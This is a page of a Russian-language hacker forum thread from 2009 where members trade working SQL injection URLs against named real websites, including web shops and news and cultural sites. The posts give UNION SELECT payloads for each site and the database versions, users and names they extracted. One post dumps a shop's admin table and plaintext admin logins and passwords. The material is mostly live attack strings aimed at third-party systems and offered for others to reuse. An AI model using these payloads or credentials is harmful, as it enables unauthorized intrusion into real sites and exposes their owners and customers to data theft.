HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 794 из 1602 « Первая < 294694744784 790 791 792 793 794 795 796 797 798 8048448941294 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.03.2009, 12:35
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
По умолчанию
Интернет магазин

saktalingchan.com PR=5


Database saktalin_shop
Таблицы:
Код:
CJ_UsersOnline
true_admin  
true_boardans 
true_boardque 
true_boardworld 
true_config  
true_confirm  
true_content 
true_contentcat 
true_contentsub 
true_gallery  
true_gallerycat  
true_help 
true_help2  
true_items  
true_links  
true_product 
true_productcategory 
true_productcategorysub 
true_proname 
true_sale 
true_ticket

Код:
http://www.saktalingchan.com/product.php?catid=1&catsubid=3&id=171+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3,id,user,pass ),10,11,12,13,14,15,16,17,18,19,20+from+true_admin--
С выводом пароля че-то втыкал долго не думал что pass

2 админа
login:saktalingchan pass:8687222
login:trueamulet pass:jwebmaster



Админку не нашел правда я её и не особо искал




grandlite.co.th


Database grandlit_db
Table:
Код:
grandliteadmin 
prdadep  
prdbcat 
prdcprd

Сайт ваще весь дырявый как друшлак

Код:
http://www.grandlite.co.th/onproduct.php?id=277+UNION+SELECT+1,2,3,4,concat_ws(0x3,password),6,7,8,9,10,11+from+grandliteadmin+limit+1,1--

Код:
http://www.grandlite.co.th/product.php?depid=9+UNION+SELECT+1,2,3,4,concat_ws(0x3,password),6,7,8,9,10,11+from+grandliteadmin--
Админку не нашёл и тут. Все что удалось узнать это pass=password а логин скоре всего admin.
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось S0ulVortex; 01.03.2009 в 12:55..
 
Ответить с цитированием

  #2  
Старый 01.03.2009, 15:05
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


По умолчанию
АП, вот вам мой севодняшний сбор уязвимостей! Пройдемся по nl.
Код:
http://www.nanoshield.nl/productinfo.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8--
версия/юзер/бд:
Код:
faq@blade22.geenpunt.nl5.0.32-Debian_7etch8faq
------------------------------------------------------------------
Код:
http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3--
версия/юзер/бд:
Код:
educos@www03.ip2.net5.0.51educos
------------------------------------------------------------------

Код:
http://www.jansiebelink.nl/detail.php?id=-1+union+all+select+concat_ws(version(),user(),database())--
версия/юзер/бд:

Код:
haas@10.171.105.65.0.32-Debian_7etch8-logjan
----------------------------------------------------------------
Код:
http://www.nvha.nl/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
версия/юзер/бд:

Код:
5053nvha@10.0.1.615.0.51a-3ubuntu5.15053nvha
-----------------------------------------------------------------

Код:
http://www.art-innovation.nl/event.php?id=-1+union+all+select+concat_ws(version(),user(),database()),1--
версия/юзер/бд:

Код:
artinnovat_main@localhost4.0.23-standard-logartinnovat_main
------------------------------------------------------------------

Код:
http://www.tamaynut.nl/newsdetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10,11--
версия/юзер/бд:

Код:
tamayn32_tamaynu@localhost4.1.22-standardtamayn32_tamaynut
----------------------------------------------------------------

Код:
http://www.trovet.nl/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(version(),user(),database()),6,7--
версия/юзер/бд:

Код:
trovet_user@localhost5.0.27trovet_data
---------------------------------------------------------------

Код:
http://www.26000gezichten.nl/news.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13--
версия/юзер/бд:

Код:
26000gezichten@localhost4.0.24_Debian-10sarge2-log26000gezichten
--------------------------------------------------------------

Код:
http://www.zeelandwoning.nl/pages.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2--
версия/юзер/бд:

Код:
zeelandwon_joom@localhost5.0.51a-community-logzeelandwon_joom
---------------------------------------------------------------

Код:
http://www.opdesloep.nl/pages.php?id=-1+union+all+select+0,1,2,convert(concat_ws(version(),user(),database())+using+latin1),4,5--
версия/юзер/бд:

Код:
sitesuntrack@localhost4.1.12-standard-logsuntrack
----------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #3  
Старый 01.03.2009, 15:10
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
По умолчанию
Код:
http://www.bmwstyle.ru/bmw.php?module=news&news_type=cur_id&news_id=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5--
Database Version : 5.0.67-0ubuntu6
Database name : www_bmwstyle_ru
User name : bmwstyle@localhost
 
Ответить с цитированием

  #4  
Старый 01.03.2009, 15:35
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
По умолчанию
paraisobahamas.com PR=3

Код:
http://paraisobahamas.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

version: 4.1.22-standard-log
user: paraisob_admin@localhost
database: paraisob_cms
 
Ответить с цитированием

Продолжение славного дела:)
  #5  
Старый 01.03.2009, 17:18
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


По умолчанию Продолжение славного дела:)
Продолжение славного дела

Код:
http://www.danishdesignwatches.eu/prod_detail.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(version(),user(),database()),8,9,10,11,12,13,14,15,16,17--
версия/юзер/бд:

Код:
26872admin@10.0.5.615.0.51a-3ubuntu5.126872admin
----------------------------------------------------------

Код:
http://www.granietbeurs.nl/website.php?id=-1+union+all+select+convert(concat_ws(version(),user(),database())+using+latin1)--
версия/юзер/бд:

Код:
dagranietb_gran@localhost4.1.12-standard-logdagranietb_gran
----------------------------------------------------------

Код:
http://www.spsrasd.info/fr/detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7--
версия/юзер/бд:

Код:
spsrasd@localhost5.0.58cms
---------------------------------------------------------

Код:
http://www.digitaccess.fr/category.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
версия/юзер/бд:

Код:
digit93@localhost5.0.27digitaccess

--------------------------------------------------------

Код:
http://www.cmgolf.fr/product.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9--
версия/юзер/бд:

Код:
my67521@62.193.203.2265.0.32-Debian_7etch6-logmy67521
-------------------------------------------------------

Код:
http://www.serema.fr/produit.php?id=-1+union+all+select+0,1,convert(concat_ws(version(),user(),database())+using+latin1),3,4,5,6--
версия/юзер/бд:

смотрим в свойствах картинки

Код:
serema@localhost4.1.10aserema_fr
--------------------------------------------------

Код:
http://www.eliotrope.fr/theme.php?id=-1+union+all+select+0,concat_ws(version(),user(),database())--
версия/юзер/бд:

Код:
elio_trope@localhost5.0.32-Debian_7etch8-logeliotrope_base
---------------------------------------------------------

Код:
http://www.fetedelamusique.culture.fr/page.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7--
версия/юзер/бд:

Код:
musique@euterpe.culture.fr5.0.45-Max-logmusique
--------------------------------------------------------

Код:
http://design-facade.fr/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7--
версия/юзер/бд:

Код:
designfa@10.0.75.124.0.25-standard-logdesignfa
--------------------------------------------------------

Код:
http://www.cshm-schm.ca/fr/event.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
версия/юзер/бд:

Код:
cshm@localhost5.0.27cshm
Думаю на первое время вам хватит
-----------------------------------------------------
The End!
Последний раз редактировалось -m0rgan-; 01.03.2009 в 17:21..
 
Ответить с цитированием

  #6  
Старый 01.03.2009, 17:29
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
По умолчанию
Pagerank: 6
тИЦ: 2300


Код:
http://www.sibfair.ru/?current=262&nid=-1+union+select+1,aes_ decrypt(aes_encrypt( concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6--
Database Version : 4.1.16
Database name : fair
User name : fair@localhost
 
Ответить с цитированием

  #7  
Старый 01.03.2009, 18:43
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию
http://www.capitaneanubebi.ro/Web/cjasbr/pagina.php?id=-3+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19/*



Database Version: 5.0.45-log
Database name: cjasbr
User name: cjasbr@core3.hostbase.net
 
Ответить с цитированием

  #8  
Старый 01.03.2009, 19:03
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию
Код:
http://www.webwisesage.com/maxwrite/diarypage.php?did=-9999999999999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17
user():database():version()
xwebwisesage@serenity.futurequest.net:xwebwisesage-wws:4.0.2

Это уязвимый двиг: http://forum.antichat.ru/showpost.php?p=1144179&postcount=98
PS: Сорри, не увидел, что openwds уже был...
Последний раз редактировалось mailbrush; 01.03.2009 в 19:17..
 
Ответить с цитированием

  #9  
Старый 01.03.2009, 19:16
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию
http://www.voxmarsign.ro/produse-detalii.php?id=-54+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--&t=8



Database Version: 5.0.45-log
Database name: voxmar_sign
User name: voxmar_sign@core3.hostbase.net
 
Ответить с цитированием

  #10  
Старый 01.03.2009, 19:22
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
По умолчанию
www.fresno-shopping.com PR=2

Код:
http://www.fresno-shopping.com/news.php?ax=v&n=13&id=8&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

version: 4.1.22-standard-log
user: fresnosh_user@localhost
database: fresnosh_cms

www.manchester-center.com PR=4


Код:
http://www.manchester-center.com/news.php?ax=v&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
version: 4.1.22-standard
user: manchest_user@localhost
database: manchest_cms
 
Ответить с цитированием
Ответ
Страница 794 из 1602 « Первая < 294694744784 790 791 792 793 794 795 796 797 798 8048448941294 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.